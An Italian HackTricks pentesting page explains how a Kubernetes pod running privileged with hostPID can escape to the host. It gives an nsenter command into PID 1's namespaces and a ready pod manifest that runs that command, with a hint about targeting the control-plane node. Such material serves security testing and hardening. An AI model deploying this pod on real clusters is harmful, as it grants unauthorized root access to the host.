Pod Escape Privileges

Impara l'hacking di AWS da zero a esperto con htARTE (HackTricks AWS Red Team Expert)!

Altri modi per supportare HackTricks:

Privilegiati e hostPID

Con questi privilegi avrai accesso ai processi dell'host e abbastanza privilegi per entrare all'interno dello spazio dei nomi di uno dei processi dell'host. Nota che potresti potenzialmente non aver bisogno di privilegiati ma solo di alcune capacità e di altri bypass di difese potenziali (come apparmor e/o seccomp).

Basta eseguire qualcosa di simile a quanto segue per poter fuggire dal pod:

nsenter --target 1 --mount --uts --ipc --net --pid -- bash

Esempio di configurazione:

apiVersion: v1
kind: Pod
metadata:
name: priv-and-hostpid-exec-pod
labels:
app: pentest
spec:
hostPID: true
containers:
- name: priv-and-hostpid-pod
image: ubuntu
tty: true
securityContext:
privileged: true
command: [ "nsenter", "--target", "1", "--mount", "--uts", "--ipc", "--net", "--pid", "--", "bash" ]
#nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name
Impara l'hacking di AWS da zero a eroe con htARTE (HackTricks AWS Red Team Expert)!

Altri modi per supportare HackTricks:

Last updated